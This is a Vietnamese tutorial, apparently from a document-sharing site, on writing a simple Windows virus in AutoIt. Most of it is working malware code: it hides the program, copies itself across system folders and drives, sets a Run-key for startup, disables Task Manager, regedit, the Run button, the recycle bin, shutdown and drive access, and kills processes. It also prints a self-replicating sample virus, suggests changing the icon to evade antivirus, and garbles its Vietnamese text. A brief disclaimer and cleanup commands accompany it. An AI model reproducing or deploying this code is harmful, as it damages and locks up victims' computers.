cách viết một chương trình virus đơn giản

Thanhcuong1990@gmail.com

Đ vi t m t ch ng trình virus đ n gi n,đ u tiên các b n ph i downể ế ộ ươ ơ ả ầ ạ ả

ch ng trình v t i đâyươ ề ạ

AutoIt Script Home Page

Link direct: http://www.autoitscript.com/cgi-bin/...t-v3-setup.exe

*Chú ý: +Khi edit 1 m t con virus b t bu c ph i nh n ph i chu t r iộ ắ ộ ả ấ ả ộ ồ

nh n edit script, ch n u nh n chu t trái nh bình th ng là b n s tấ ứ ế ấ ộ ư ườ ạ ẽ ự

dính con virus mà b n làm ra đó ạ

+Không nên ki m ebook autoit vì nó kô h u d ng cho b n đâu, n u mu nế ữ ụ ạ ế ố

h c sâu và r ng h n thì b n b t bu c ph i đ c trong file help c a ch ngọ ộ ơ ạ ắ ộ ả ọ ủ ươ

trình

+Icon c a ch ng trình b t bu c kô đ c đ m c đ nh vì các trình virusủ ươ ắ ộ ượ ẽ ặ ị

s phát hi nẽ ệ

+Các l nh mình s làm n i lên ệ ẽ ổ

Nh ng gì mình vi t lên đây ch mang tính ch t tham kh o.Yêu c u cácư ế ỉ ấ ả ầ

b n không dùng nh ng gì mình vi t lên đây đ phá ng i khácạ ữ ế ể ườ

B t đ u:ắ ầ

B c 1: Coppy các code t hoalong77ướ ừ

B c 2: T o 1 file .au3ướ ạ

B c 3:Edit scirptướ

B c 4 Paste code vàoướ

B c 5:Convert file au3 --> exe (cái này quan tr ng)ướ ọ

N u đây là l n đâu tiên b n convert file au3 --> exe thì ph i làm theo cácế ầ ạ ả

b c đó, nh ng v sau b n ch c n nh n ph i ch t vào file au3 và nh nướ ư ề ạ ỉ ầ ấ ả ộ ấ

compile script là file exe s compile ngay t i th m c ch a file au3 ^^ẽ ạ ư ụ ứ

L nh đ u tiên mà b t bu c con virus = autoit nào cũng ph i có:ệ ầ ắ ộ ả

#Notrayicon

---> đ kô hi n ch ng trình taskbar,có nghĩa là nó s ch y n trongể ệ ươ ở ẽ ạ ẩ

Windown

FileCopy(@ScriptDir & "\***.exe","C:\WINDOWS",1)

---> "***" s là tên virus mà b n t o con autoit này, l nh này dùng đẽ ạ ạ ở ệ ể

k t h p v i l nh k ti p.L u ý:Tên virus này b n s t o ra lúc biên dichế ợ ớ ệ ế ế ư ạ ẽ ạ

ch ng trình thành file .exeươ

L nh kh c ph c:ệ ắ ụ

FileDelete("C:\Windows\*****.exe")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr

entVersion\Run","explorer","REG_SZ",@WindowsDir & "\*****.exe")

---> **** s là tên ch ng trình, l nh này dùng đ kh i đ ng virus m iẽ ươ ệ ể ở ộ ỗ

khi máy tính đ c b t lên, và ch dùng đ c khi có l nh trênượ ậ ỉ ượ ệ ở

L nh kh c ph c: ệ ắ ụ

RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur

rentVersion\Run","explorer")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr

entVersion\Policies\System","DisableTaskMgr","REG_DWORD","1")

----> l nh này s giúp con virus c a b n khóa taskmanager c a máy tính ệ ẽ ủ ạ ủ

L nh kh c ph c:ệ ắ ụ

RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\System","DisableTaskMgr")

RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur

rentVersion\Policies\System","DisableTaskMgr")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr

entVersion\Policies\System","DisableRegistryTools","REG_DWORD","1")

----> l nh này s giúp con virus c a b n khóa regedit c a máy tínhệ ẽ ủ ạ ủ

L nh kh c ph c:ệ ắ ụ

RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\System","DisableRegistryTools")

RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur

rentVersion\Policies\System","DisableRegistryTools")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr

entVersion\Policies\Explorer","NoRun","REG_DWORD","1")

----> l nh này s giúp làm m t nút run trong windowsệ ẽ ấ

L nh kh c ph c:ệ ắ ụ

RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur

rentVersion\Policies\Explorer","NoRun")

RegWrite("HKEY_LOCAL_MACHINE\ SOFTWARE\

Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete","

RED_DWORD","1")

----->L nh này s làm vô hi u hoá thùng rácệ ẽ ệ

L nh kh c ph c:ệ ắ ụ

RegDelete("HKEY_LOCAL_MACHINE\ SOFTWARE\

Microsoft\Windows\CurrentVersion\Explorer\BitBucket","NukeOnDelete")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","671088

63")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr

entVersion\Policies\Explorer","NoViewOnDrive","REG_DWORD","67108

863")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr

entVersion\Policies\Explorer","NoDrives","REG_DWORD","67108863")

----> l nh này giúp b n khóa đĩa c a ng i khác, kô cho truy c p vào ệ ạ ổ ủ ườ ậ ổ

đĩa, "67108863" ---> là thông s đ khóa t t c các đĩaố ể ấ ả ổ

L nh kh c ph c:ệ ắ ụ

RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\Explorer","NoViewOnDrive")

RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur

rentVersion\Policies\Explorer","NoViewOnDrive")

RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\Explorer","NoDrives")

RegDelete("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Cur

rentVersion\Policies\Explorer","NoDrives")

RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\Explorer","NoClose","REG_DWORD","1")

---> l nh này làm m t nút Shutdown Start ệ ấ ở

L nh kh c ph c:ệ ắ ụ

RegDelete("HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre

ntVersion\Policies\Explorer","NoClose")

L nh reset máy: Các ban c n l u ý v i các l nh reset máy vì nó s resetệ ầ ư ớ ệ ẽ

máy c a ban li n t c m i khi b n vào Windownủ ệ ụ ỗ ạ

Shutdown(thông s )ố

Các thông s có th có làố ể

+0: Đ i user (hay th ng g i là log off)ổ ườ ọ

+1: T t máy (shutdown)ắ

+2: reset máy(restart)

+4: Force

+8: Power down

+32: Stanby

+64: Hibernate

VD: Shutdown(2) ---> reset máy

L nh đ i, d ng:ệ ợ ừ

Sleep(seconds)

VD: Sleep(3000) ---> D ng 3 giâyừ

L nh kô cho m 1 ch ng trình b t kỳ (ch c n bi t tên process c aệ ỡ ươ ấ ỉ ầ ế ủ

ch ng trình đó)ươ

$VA = ProcessExists("iexplore.exe")

$RA = ProcessClose("iexplore.exe")

$BU = ProcessExists("winamp.exe")

$BA = ProcessClose("winamp.exe")

While 1

if $VA then $RA

$RA = ProcessClose("iexplore.exe")

if $BU then $BA

$BA = ProcessClose("winamp.exe")

WEnd

----> VD: If ProcessExists("iexplorer.exe") then ---> khi máy tính m fileở

iexplorer (IE)

ProcessClose("iexplorer.exe") --> đóng ngay l p t cậ ứ

EndIf

Còn đây la m t con virus nh mà mình đã t vi t:ộ ỏ ự ế

#cs ----------------------------------------------------------------------------

Author: hoalong77

Script Function:

Template AutoIt script.

#ce ----------------------------------------------------------------------------

; Script Start - Add your code below here

#Notrayicon

FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Common Files",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet

Explorer",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media

Player",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows Media

Player\Sample Playlists",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Internet

Explorer\SIGNUP",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system32",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS\system",1)

FileCopy(@ScriptDir & "\Setup.exe","C:\Program Files\Windows NT",1)

FileCopy(@ScriptDir & "\Setup.exe","D:\",1)

FileCopy(@ScriptDir & "\Setup.exe","E:\",1)

FileCopy(@ScriptDir & "\Setup.exe","F:\",1)

FileCopy(@ScriptDir & "\Setup.exe","G:\",1)

FileCopy(@ScriptDir & "\Setup.exe","H:\",1)

FileCopy(@ScriptDir & "\Setup.exe","J:\",1)

RegWrite("HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr

entVersion\Run","explorer","REG_SZ",@WindowsDir & "\Setup.exe")

While 1

FileCopy(@ScriptDir & "\Setup.exe","C:\WINDOWS",1)

cách viết một chương trình virus đơn giản

Chủ đề:

Tài liệu liên quan

Tài liêu mới

AI tóm tắt

Giới thiệu tài liệu

Đối tượng sử dụng

Từ khoá chính

Nội dung tóm tắt

Hỗ trợ

Phương thức thanh toán

Theo dõi chúng tôi